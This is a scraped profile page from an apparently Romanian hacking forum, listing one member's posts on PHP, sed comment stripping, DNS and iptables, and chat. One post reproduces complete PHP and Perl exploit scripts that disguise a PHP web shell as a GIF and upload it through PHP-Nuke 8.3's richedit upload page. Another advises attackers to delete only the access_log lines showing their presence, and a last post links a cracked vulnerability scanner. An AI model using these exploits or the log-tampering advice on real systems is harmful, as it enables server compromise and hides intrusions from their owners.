-
Posts
2643 -
Joined
-
Last visited
-
Days Won
90
Everything posted by Zatarra
-
Te inseli, il foloseste pe cel care il ai tu setat default. Daca nu crezi incearca cu un script de genu asta: <?php echo $_SERVER['HTTP_USER_AGENT'] . "\n\n"; $browser = get_browser(null, true); print_r($browser); ?>
-
Salut si bun venit pe la noi. Dupa cum spunea si wildchild si eu te sfatuiesc sa pui orice fel de intrebare, trasnita sau nu, pe care o ai fara sa ai nici o retinere. Si da, este adevarat, pe forum avem si exemple 'asa nu' dar sunt si multi care au cunostinte vaste in anumite domenii si daca ai o problema te vor ajuta. Sper sa contribui si tu cu ce poti la comunitate, orice intiativa proprie e privita cu ochi buni.
-
Warning: curl_setopt() [function.curl-setopt]: Invalid curl configuration option in /home/net/public_html/*****/do_xss_scanner.php on line 121 Warning: curl_setopt() [function.curl-setopt]: Invalid curl configuration option in /home/net/public_html/*****/do_sqli_scanner.php on line 155 Inca mai ai bug`uri Edit: @pr00f ms, nu am observat Edit2: Voi chiar credeti ca sunt atat de genii baietii? eu cred ca`i mai usor sa decripteze hash`urile
-
E awsome, ar fi binevenita o schimbare a banner-ului, dar deocamdata zic sa se mai faca brainstorming pe ideea asta, poate se obtine ceva belea rau. P.S. ;-)
-
PHP exploit: <?php /////////////////////////////////////////////////// #Iranian Pentesters Home #PHP Nuke 8.3 MT AFU Vulnerability #Coded by:4n0nym0us & b3hz4d #http://www.pentesters.ir /////////////////////////////////////////////////// //Settings: $address = 'http://your-target.com'; $file = 'shell.php.01'; $prefix='pentesters_'; //Exploit: @$file_data = "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"; @$file_data .= file_get_contents($file); file_put_contents($prefix . $file, $file_data); $file = $prefix . $file; echo "\n" . "///////////////////////////////////" ."\n"; echo " Iranian Pentesters Home" . "\n"; echo " PHP Nuke 8.3 MT RFU Vulnerability" . "\n"; echo "///////////////////////////////////" ."\n"; $address_c = $address . '/includes/richedit/upload.php'; $postdata = array("userfile" => "@$file;type=image/gif","upload" => "1","path" => "images","pwd" => "1"); $data = post_data($address_c, $postdata); $start = strpos($data, "<img src=\"upload"); if ($start != null) { $data = substr($data,$start + 10); $end = strpos($data, "\""); $data = substr($data,0,$end); echo "\n" . "Uploaded File: " . $address . "/includes/richedit/" . $data . "\n"; } else echo "\n" . "Upload Failed!!!"; function post_data($address, $data) { $curl = curl_init($address); curl_setopt($curl, CURLOPT_USERAGENT, "Opera/9.0 (Windows NT 5.0; U; en)"); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $data); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); $content = curl_exec($curl); curl_close($curl); return $content; } ?> PERL exploit #!/usr/bin/perl ################################################### #//Iranian Pentesters Home #//PHP Nuke 8.3 MT AFU Vulnerability #//Coded by:4n0nym0us & b3hz4d #//http://www.pentesters.ir ################################################### use LWP; use HTTP::Request::Common; print "\n" . "///////////////////////////////////" ."\n"; print " Iranian Pentesters Home" . "\n"; print " PHP Nuke 8.3 MT AFU Vulnerability" . "\n"; print "///////////////////////////////////" ."\n"; print "\n" . "Syntax: perl xpl.pl http://your-target.com shell.php.01 [prefix]" . "\n\n"; my $url = $ARGV[0]."/includes/richedit/upload.php"; my $filename = $ARGV[1]; my $prefix = $ARGV[2]; my $rfile = $prefix . $filename . ".gif"; open fhandle, $ARGV[1] or die $!; while (<fhandle>){ $shell .= $_; } close fhandle; open fhandle, ">", $rfile or die $!; print fhandle "\x47\x49\x46\x38\x39\x61\x05\x00\x05\x00"."\n".$shell; close(fhandle); my $ua = LWP::UserAgent->new; $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.12) Gecko/20101026"); my $req = POST $url, Content_Type => 'form-data', Content => [ upload => "1", path => 'images', pwd => "1", userfile => [ $rfile,$prefix . $filename ] ]; my $res = $ua->request($req); $between=substr($res->as_string(), index($res->as_string(), '<img src="upload/')+10, index($res->as_string(), 'onclick="self.parent.') - index($res->as_string(), '<img src="upload/')-12); print("Uploaded File: " . $ARGV[0]."/includes/richedit/".$between); exit; Sursa: PHP Nuke 8.3 MT Shell Upload ? Packet Storm Video: Download - 213.mp4 - Persiangig
-
E buna ideea pentru un spread!
-
Codex.. ce idee trasnita mi`ai dat.. MS.
-
A mea ii ceva de genu: mataigrasa sau i<3mata ? Guess it
-
Ok atunci hai sa iti explic unele chestii, poate inveti si tu ceva din ele: 1. Ai pus degeaba sudo in fata comenzii de dezarhivare. Atat timp cat descarci arhiva cu un user ea va fii creata cu permisiunile setate prin umask-ul userului respectiv. Astfel nu e nevoie sa mai dai sudo pentru dezarhivare. 2. O posibila problema ar putea fii permisiuniile fisierelor din arhiva, care sunt exact aceleasi cu cele din momentul arhivarii. Deci o comanda de chmod +x * ar rezolva problema 3. Acum sa iti explic cum sta treaba cu logurile: a) degeaba stergi .bash_history deoarece tu vei sterge toata istoria comenzilor executate PANA in momentul in care te-ai logat tu pe server. degeaba stergi .ksh_history si .csh_history deoarece tu nu vei folosi nici Korn shell nici C shell. c) degeaba stergi .bash_logout deoarece nici un server nu face script in fisierul de logout. d) sa nu mai spun ca multe din locatiile care le stergi tu cu comenzile respective nu exista. e) singura cheste relativ folositoare e sa stergi access_log-ul cum spui tu, in cazul in care intri pe interfata web, dar nici asta nu e indicata deoarece e o metoda foarte clara ca cineva a fost pe server, asadar o alternativa ar fii sa stergi doar rand-urile care dovedesc ca tu ai trecut p'acolo. 4. Ma bucur ca nu ai inceput sa injuri sau alte chestii de genul 5. Bafta si alta data mai cere si tu ajutorul in stanga si in dreapta cand vrei sa faci un tutorial si nu esti sigur pe el
- 51 replies
-
- 1
-
-
- brute forcer
- hack
-
(and 3 more)
Tagged with:
-
1. De unde ai copiat prostia asta? 2. Unixcod-ul e vechi rau 3. Asa spusele comenzi de sters log-uri nu au nici o treaba cu ceea ce vorbesti tu aici 4. Sper sa nu mai postezi prostii asa mari iar daca o faci sa postezi macar ceva facut de tine in proportie de 100% 5. Primele 2 range-uri alea nu exista, exista doar o clasa de timp B cu un subnet mask de /16
- 51 replies
-
- 1
-
-
- brute forcer
- hack
-
(and 3 more)
Tagged with:
-
E slab rau configu de Conky. Am sa postez eu zilele astea pe al meu de acasa ;-) sa vezi acolo config pericol fara frame-uri cum iti apare tie
-
La BOINC sunt in primi 50 de membrii din Romania (All Projects) sunt si membru activ din 2oo9. Recomand cu caldura pentru cei care doresc sa participe. Eu unul sunt cel mai activ aici: SETI@home
-
Stiu eu. Iti configurezi un server DNS si pui la primary dns ip`ul serverului tau. Restul configuratiei o declari in zona. Daca vrei sa iti functioneze din exterior trebuie neaparat sa ai setat la primary dns ip`u serverului tau de DNS, altfel nu iti va merge. Edit1: Trebuie sa mearga si cu route add, am uitat de varianta asta Edit2: a... da.. si iptables ;-) iptables -t nat -A PREROUTING -p tcp -d xx.xx.xx.xx --dport <port number> -j DNAT --to-destination yy.yy.yy.yy P.S. E Zatarra cu doi R
-
Do not miss.. In seara aceasta eclipsa totala de luna. Pentru mai multe detalii visit: Observatorul Astronomic „Amiral Vasile Urseanu” Eclips? total? de Lun? în noaptea de 15 spre 16 iunie 2011
-
Vi`l prezint pe Kabron la chitara cu o scurta istorioara Edit: @Un.Neuron poanta e ca trebuie sa stii umpic de engleza pentru a intelege ce se canta acolo
-
ReSpEcT si mersi, sper sa nu dezamagesc. Oricum functia e mai putin importanta, comunitatea face totul!
-
De multe ori am vazut chestia asta, as dori sa se implementeze o solutie pentru a se putea schimba titlul. Ori e bug, ori nu functioneaza, dar daca dau go advanced si modific titlul el ramane acelasi Mersi anticipat si sper sa se ia in considerare rugamintea Edit: Sa nu mai creez alt topic as dori sa va sugerez sa schimbati gif-ul asta cu unul mai sugestiv, sa inteleaga tot omul ca acolo se apasa cand doresti sa reportezi un post
-
- 1
-
-
@cifratorul am spus la faza cu scuze cum sta treaba Oricum am facut un tutorial cu scoaterea comment-urilor din surse in C/C++ Pentru tutorial click Here
-
Eliminare comentarii pentru soursa program in C/C++ (using sed)
Zatarra replied to Zatarra's topic in Tutoriale in romana
La aia nu m`am gandit Sincer nu prea ai avea motive sa folosesti // sau /* in printf-uri sau in alte chestii de genu, cu toate ca ai dreptate, daca o functie contine // sau /* va sterge pana la capat sau pana la */, depinde de caz In tot anii mei de programare nu am folosit asa ceva, dar you never know ;-) cu toate ca repet e tare ilogic -
Avem sursa source.c /*Program simplu: Fiecare baiat din lume are 3 mere Fiecare fata din lume are 5 mere Sa se creeze un program care afla numarul de mere dintr-o camera cu un numar de baieti si de fete introdus de la tastatura*/ #include <stdio.h> int NumarBaieti; int NumarFete; int NumarMere; void main (void) { printf("\nIntrodu numarul de baieti din camera"); scanf("%d",&NumarBaieti); //Citim numarul de baieti printf("\nIntrodu numarul de fete din camera"); scanf("%d",&NumarFete); //Citim numarul de fete NumarMere=NumarBaieti*3+NumarFete*5; //Calculam numarul de mere printf("In camera sunt %d mere",NumarMere); } Pentru a elimina comentariile de genul: /*Program simplu: Fiecare baiat din lume are 3 mere Fiecare fata din lume are 5 mere Sa se creeze un program care afla numarul de mere dintr-o camera cu un numar de baieti si de fete introdus de la tastatura*/ Folosim urmatoarea comanda: cat source.c |sed '/\/\*/,/\*\//d' > newsource.c Noua sursa newsource.c va arata astfel: #include <stdio.h> int NumarBaieti; int NumarFete; int NumarMere; void main (void) { printf("\nIntrodu numarul de baieti din camera"); scanf("%d",&NumarBaieti); //Citim numarul de baieti printf("\nIntrodu numarul de fete din camera"); scanf("%d",&NumarFete); //Citim numarul de fete NumarMere=NumarBaieti*3+NumarFete*5; //Calculam numarul de mere printf("In camera sunt %d mere",NumarMere); } Pentru a elimina comentariile de genul: scanf("%d",&NumarBaieti); //Citim numarul de baieti sau //Calculam numarul de mere Folosim urmatoarea comanda: cat source.c |sed -e 's/\/\/.*$//g' > newsource.c Noua sursa newsource.c va arata astfel: /*Program simplu: Fiecare baiat din lume are 3 mere Fiecare fata din lume are 5 mere Sa se creeze un program care afla numarul de mere dintr-o camera cu un numar de baieti si de fete introdus de la tastatura*/ #include <stdio.h> int NumarBaieti; int NumarFete; int NumarMere; void main (void) { printf("\nIntrodu numarul de baieti din camera"); scanf("%d",&NumarBaieti); printf("\nIntrodu numarul de fete din camera"); scanf("%d",&NumarFete); NumarMere=NumarBaieti*3+NumarFete*5; printf("In camera sunt %d mere",NumarMere); } Pentru a elimina liniile goale folosim una din urmatoarele comenzi: cat source.c |sed '/^$/d' > newsource.c cat source.c |sed '/./!d' > newsource.c Noua sursa newsource.c va arata astfel: /*Program simplu: Fiecare baiat din lume are 3 mere Fiecare fata din lume are 5 mere Sa se creeze un program care afla numarul de mere dintr-o camera cu un numar de baieti si de fete introdus de la tastatura*/ #include <stdio.h> int NumarBaieti; int NumarFete; int NumarMere; void main (void) { printf("\nIntrodu numarul de baieti din camera"); scanf("%d",&NumarBaieti); //Citim numarul de baieti printf("\nIntrodu numarul de fete din camera"); scanf("%d",&NumarFete); //Citim numarul de fete NumarMere=NumarBaieti*3+NumarFete*5; //Calculam numarul de mere printf("In camera sunt %d mere",NumarMere); } Pentru a elimina liniile care contin doar tab-uri sau spatii folosim urmoatoarele comenzi: Pentru tab-uri: cat source.c |sed '/^\t\{1,\}$/d' > newsource.c Pentru space-uri: cat source.c |sed '/^\s\{1,\}$/d' > newsource.c Pentru a aplica toate cele prezentate folosim urmatoarea comanda: cat source.c |sed '/\/\*/,/\*\//d' |sed -e 's/\/\/.*$//g' |sed '/^$/d' |sed '/^\s\{1,\}$/d' |sed '/^\t\{1,\}$/d' > newsource.c Noua sursa newsource.c va arata astfel: #include <stdio.h> int NumarBaieti; int NumarFete; int NumarMere; void main (void) { printf("\nIntrodu numarul de baieti din camera"); scanf("%d",&NumarBaieti); printf("\nIntrodu numarul de fete din camera"); scanf("%d",&NumarFete); NumarMere=NumarBaieti*3+NumarFete*5; printf("In camera sunt %d mere",NumarMere); } Daca aveti ceva sugestii sau eventuale intrebari nu ezitati sa postati P.S. Scuze pentru "soursa" - sunt obosit si nici nu pot modifica titlul
-
Prea simplu Sa presupunem ca ai o sursa source.c Dai in terminal comanda asta cat source.c |grep -v "^#" > newsource.c Si apoi vei avea fisieru newsource.c fara linile cu comentarii de genu #Comment ;-) Scuze asta e daca ai o sursa de bash scripting, cu care eu sunt obisnuit Exista si asa: cat source.c |grep -v "^//" > newsource.c Pentru a sterge linile care incep cu '//' (daca asta vroiai) Pentru '/*' e putin mai complicat dar se poate Edit: Am perfectionat umpic script-ul pentru a scoate liniile care incep cu # (pastrand prima linie - pentru bash scripting) si totodata eliminand liniile goale 1. head -1 source.c > newsource.c 2. cat source.c |grep -v "^#" |sed '/^$/d' >> newsource.c 1. Copiaza prima linie in fisierul newsource.c 2. Elimina liniile care incep cu # si liniile goale Exemplu: source.c #! /bin/sed -nf # Remove C and C++ comments, by Brian Hiles (brian_hiles@rocketmail.com) # Sped up (and bugfixed to some extent) by Paolo Bonzini (bonzini@gnu.org) # Works its way through the line, copying to hold space the text up to the sdgsdfg //dsfgs dfh # //r12 3t W /*Qd g 23 g #@!%@!#T dg sdg s gw e Si am obtinut: newsource.c #! /bin/sed -nf sdgsdfg //dsfgs dfh //r12 3t W /*Qd g 23 g dg sdg s gw e
-
Iti scaneaza un site de vulnerabilitati. E destul de bun. Edit: Download cu tot cu crack: Aici